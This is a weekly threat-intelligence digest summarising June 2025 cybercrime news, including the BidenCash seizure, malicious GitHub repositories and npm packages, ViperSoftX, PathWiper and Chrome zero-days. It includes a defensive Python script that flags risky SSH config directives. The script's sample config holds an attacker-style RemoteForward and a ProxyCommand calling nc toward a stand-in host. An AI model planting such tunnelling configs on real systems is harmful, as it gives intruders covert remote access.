Cyware Weekly Threat Intelligence, June 02–06, 2025

The Good
Authorities have taken down a major hub for stolen financial data. The DOJ seized approximately 145 domains associated with the BidenCash marketplace, which had evolved from a small credit card shop in 2022 into a massive hub for stolen payment data. In a move to reinforce Europe’s cyber defenses, Microsoft is stepping in with strategic support. The newly launched European Security Program offers EU governments free access to AI-driven threat intelligence, vulnerability alerts, and guidance to counter attacks from state-sponsored actors.
The DOJ seized approximately 145 darknet and clear web domains linked to the BidenCash marketplace, which began operations in March 2022. Initially a low-profile credit card shop, BidenCash gained popularity by releasing free promotional dumps. With over 117,000 users, it trafficked over 15 million payment cards and generated $17 million in revenue, distributing 3.3 million stolen cards for free to attract customers. The stolen data included full card details and personal information. Authorities redirected the seized domains to law enforcement servers to prevent future criminal activity.
Microsoft launched a free European Security Program aimed at enhancing cybersecurity for EU governments, particularly against threats from state-sponsored actors in Russia, China, Iran, and North Korea. The program utilizes AI to provide real-time threat intelligence, early warnings, and guidance on vulnerabilities. Microsoft plans to strengthen partnerships with Europol, the CyberPeace Institute, and ISPs to improve threat detection and disrupt cybercrime.
The DOJ, in collaboration with Dutch and Finnish authorities, seized four domains (AvCheck[.]net, Cryptor[.]biz, Cryptor[.]live, and Crypt[.]guru) providing crypting services to cybercriminals. These services help malware evade antivirus detection, enabling unauthorized access to systems. This operation, part of Operation Endgame, aims to dismantle cybercrime networks and follows recent disruptions of other malware like Lumma Stealer.
Australia implemented mandatory ransomware payment reporting rules effective May 30, targeting organizations with an annual turnover of AUS $3 million (about US $1.93 million) and private critical infrastructure firms. These organizations must report any ransomware payments to the Australian Signals Directorate within 72 hours, detailing the payment amount, method, and communication with attackers. Public sector bodies are exempt, and non-compliance incurs civil penalties. This law, part of the Cyber Security Act 2024, aims to enhance visibility into ransomware incidents and deter payments.
The Bad
Not all GitHub projects are built with good intentions. Researchers uncovered a widespread campaign involving more than 130 repositories booby-trapped with malware disguised as game cheats, hacking tools, and utilities. A free software download could end up costing your entire crypto wallet. ViperSoftX is back in circulation, targeting crypto users with malicious PowerShell scripts bundled into cracked apps, keygens, and torrent packages. Some attackers mine crypto, JINX-0132 mines misconfigurations. This threat actor is running a stealthy cryptojacking campaign against DevOps platforms, exploiting exposed defaults and overlooked RCE flaws.
Hackers exploited a critical vulnerability (CVE-2024-42009) in the Roundcube webmail platform to steal user credentials via a spearphishing campaign targeting Polish entities. This attack, attributed to the UNC1151 threat actor linked to Belarusian and possibly Russian state interests, used XSS to execute malicious JavaScript and register a Service Worker for persistent access. The vulnerability affects Roundcube versions ≤1.5.7 and 1.6.x ≤1.6.7, with a CVSS score of 9.3. Another vulnerability (CVE-2025-49113) allowing remote code execution has been identified but not yet exploited.
Cybersecurity researchers discovered a widespread campaign involving malicious code planted in over 130 open-source GitHub repositories, targeting cybercriminals and gamers. The operation focused on backdoored repositories disguised as game cheats, hacking tools, and other utilities, with malware hidden in obfuscated code. Four types of backdoors were identified: PreBuild, Python, screensaver (.scr), and JavaScript. The campaign employs automated workflows via YAML files to simulate repository maintenance. The threat actor uses Telegram bots for notifications and paste sites for intermediate infection stages.
ViperSoftX malware is actively targeting cryptocurrency users, distributing PowerShell scripts to execute malicious commands, steal cryptocurrency wallets, and deploy additional payloads like Quasar RAT, PureCrypter, and PureHVNC. The malware is distributed via cracked software, key generators, illegal duplication programs, or torrent sites, affecting victims worldwide, including South Korea. ViperSoftX ensures persistence by leveraging task schedulers that execute obfuscated PowerShell scripts and registry-stored commands.
Positive Technologies identified a malicious campaign, "Operation Phantom Enigma," targeting Brazilian users since early 2025. Phishing emails were used to distribute malware disguised as invoices, leading to the installation of malicious browser extensions or RATs. The attackers used PowerShell scripts and BAT files to download and execute malicious extensions, targeting Google Chrome, Microsoft Edge, and Brave browsers.
The FBI issued a Public Service Announcement (PSA) on cybercriminals exploiting NFT airdrops in Hedera Hashgraph non-custodial wallets to defraud users. Scammers embed malicious URLs in transaction memos, social media, phishing emails, or third-party sites, tricking users into sharing login details or seed phrases, enabling cryptocurrency theft. The FBI advises verifying offers, avoiding unsolicited links, and reporting incidents to the IC3 with transaction details.
The threat actor JINX-0132 is behind a widespread cryptojacking campaign targeting popular DevOps applications, including Nomad, Consul, Docker, and Gitea. This campaign exploits known misconfigurations and vulnerabilities in these tools to deploy XMRig mining software on compromised servers. JINX-0132 employs a unique methodology by avoiding traditional IOCs, using off-the-shelf tools downloaded from public GitHub repositories instead of custom malware. They take advantage of Nomad's insecure default configurations, allowing unauthorized users to submit jobs that execute malicious commands. In Gitea, they exploit vulnerabilities such as post-authentication remote code execution, particularly in older versions. Approximately 25% of cloud environments use these technologies, with 5% directly exposed to the internet, and 30% of those misconfigured.
Cybercriminals are redirecting users from gaming sites and social media to fake Booking[.]com websites, employing malicious Captcha forms that trick users into executing harmful commands. This leads to the installation of Backdoor.AsyncRAT, a remote access tool that allows attackers to control infected devices and steal sensitive information. The campaign's URLs change frequently, and users should be wary of any site prompting them to copy commands into their clipboard, as this can result in significant security breaches and financial loss.
Hackers are exploiting the popular SSH client PuTTY to deliver malware on Windows systems. The malware abuses OpenSSH's default behavior and utilizes stealth techniques such as registry manipulation, custom SSH configuration files, and process masquerading to maintain persistence and evade detection. It leverages trusted system binaries like ssh.exe (LOLBIN) and creates invalid SSH configuration files to enable port forwarding and remote access for attackers.
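The PuTTY/OpenSSH item above hinges on attacker-written SSH client configuration files that turn the trusted ssh.exe binary into a tunnel. One defensive check is to parse any per-user or system-wide OpenSSH client config (on Windows that is %USERPROFILE%\.ssh\config and C:\ProgramData\ssh\ssh_config) and surface every directive that opens a port forward or executes a command. The following is an added example written for this digest, not tooling from the page or from any vendor named in it; the sample config, the host names and the 203.0.113.10 address are constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of a per-user OpenSSH client config (not from the page).
# The "updater" block mimics the kind of entry described above: a remote port
# forward back to an attacker-controlled host plus a ProxyCommand.
SAMPLE_SSH_CONFIG = """\
# constructed example, not a real config
Host build-box
    HostName build.internal.example
    User ci
    IdentityFile ~/.ssh/id_ed25519
    ServerAliveInterval 30

Host updater
    HostName 203.0.113.10
    User svc
    RemoteForward 2222 localhost:3389
    ProxyCommand nc -X connect -x 203.0.113.10:8080 %h %p
"""

# Directives that create tunnels (port forwarding) or run arbitrary commands.
# Keywords are compared case-insensitively, as OpenSSH itself does.
FORWARDING = {"remoteforward", "localforward", "dynamicforward", "gatewayports"}
COMMAND_EXEC = {"proxycommand", "localcommand", "permitlocalcommand"}

# "Keyword value" or "Keyword=value"; the first group is the keyword.
DIRECTIVE = re.compile(r"^([A-Za-z]+)(?:\s*=\s*|\s+)(.*)$")


def parse_ssh_config(text: str) -> List[Tuple[str, str, str]]:
    """Return (host_pattern, keyword_lowercase, value) for every directive.

    Host/Match lines open a new scope and are not returned as directives;
    directives seen before any Host line are attributed to "(global)".
    """
    scope = "(global)"
    directives: List[Tuple[str, str, str]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        m = DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key in ("host", "match"):
            scope = value
            continue
        directives.append((scope, key, value))
    return directives


def find_risky_directives(text: str) -> List[Dict[str, str]]:
    """Flag forwarding and command-execution directives with a severity.

    A RemoteForward is rated high because it exposes a port on the local
    machine through the remote server; other forwards and command hooks are
    rated medium and should be reviewed against what the user expects.
    """
    findings: List[Dict[str, str]] = []
    for host, key, value in parse_ssh_config(text):
        if key in FORWARDING:
            severity = "high" if key == "remoteforward" else "medium"
        elif key in COMMAND_EXEC:
            severity = "medium"
        else:
            continue
        findings.append(
            {"host": host, "directive": key, "value": value, "severity": severity}
        )
    return findings


if __name__ == "__main__":
    for f in find_risky_directives(SAMPLE_SSH_CONFIG):
        print(f"[{f['severity']}] Host {f['host']}: {f['directive']} {f['value']}")
```

Feed the real file contents to find_risky_directives and alert on any "high" finding in a config that an administrator did not author; on a fleet, the presence of any RemoteForward directive in a non-developer user's profile is itself worth a ticket.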
New Threats
Destruction masquerading as maintenance tools is hitting Ukraine’s infrastructure. Researchers attributed a new wiper malware called PathWiper to a Russia-linked APT group, targeting critical systems by leveraging legitimate administrative frameworks. A few swapped letters could be all it takes to get owned. A new supply chain attack targets Python and npm developers through typo-squatting and name confusion. A new Android banking trojan, named Crocodilus, has emerged in the threat landscape. It masquerades as legitimate apps like Google Chrome and uses overlay attacks to steal credentials from financial apps.
A new variant of the Chaos RAT, an open-source remote access trojan written in Golang and inspired by frameworks like Cobalt Strike and Sliver, is actively targeting both Windows and Linux systems. The malware provides a cross-platform administrative panel for payload generation, session management, and control of compromised machines. Chaos RAT is primarily distributed via phishing emails containing malicious links or attachments. Upon execution, it drops a script that modifies the "/etc/crontab" file to establish persistence by periodically fetching the malware. Early campaigns used Chaos RAT mainly for reconnaissance and information gathering, while deploying cryptocurrency miners like XMRig separately.
Cisco Talos identified PathWiper, a destructive wiper malware targeting Ukrainian critical infrastructure, attributed to a Russia-linked APT group. The attackers used a legitimate administrative framework to deploy malicious VBScript and execute the PathWiper executable. PathWiper overwrites storage media and file system artifacts, including MBR and NTFS attributes, with randomized data. The malware demonstrates similarities to HermeticWiper but utilizes more advanced drive enumeration and corruption techniques.
Socket discovered four malicious npm packages—pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-prediction, ethereum-smart-contract, and env-process—that target Binance Smart Chain (BSC) and Ethereum wallets. Created by the threat actor @crypto-exploit, these packages collectively received over 2,100 downloads. The first package, pancake_uniswap_validators_utils_snipe, was designed to drain crypto wallets by exfiltrating up to 85% of their balance using obfuscated JavaScript. The packages utilize environment variables to access sensitive data, including wallet addresses and private keys. The threat actor employs techniques like typosquatting and command obfuscation to evade detection and improve the effectiveness of their attacks.
A new Android banking trojan, Crocodilus, is actively targeting users in Europe, South America, and other regions, leveraging improved obfuscation techniques to evade detection. Initially discovered in March, Crocodilus masquerades as legitimate apps like Google Chrome and uses overlay attacks to steal credentials from financial apps. It also exploits accessibility permissions to extract cryptocurrency wallet seed phrases. Recent campaigns have expanded to countries like Poland, Argentina, Brazil, India, Indonesia, and the U.S., using tactics like fake Facebook ads and malicious websites to distribute the malware. New features include adding fake contacts to victims' contact lists to bypass fraud detection and collecting cryptocurrency wallet seed phrases via an automated parser.
Google has released an emergency update for Chrome to fix a high-severity zero-day vulnerability (CVE-2025-5419) in the V8 JavaScript engine, which is actively being exploited. This marks the third zero-day vulnerability addressed in 2025, following similar issues patched in March and May. Users are encouraged to update their browsers to versions 137.0.7151.68/.69 for Windows/Mac and 137.0.7151.68 for Linux. Detailed information about the exploits will be withheld until a majority of users have applied the fix.
A malicious package campaign targeting Python and npm users was discovered, using typo-squatting and name-confusion attacks on packages like Colorama and Colorizr. The attack involved cross-ecosystem tactics, with payloads allowing remote access and data exfiltration, and attempted to evade detection on Windows systems. The campaign used cross-platform baiting, with payloads for both Windows and Linux. Windows payloads involved environment variable harvesting, persistence through scheduled tasks, and antivirus evasion. Linux payloads included advanced backdoors using encrypted communication and stealth techniques to maintain long-term access.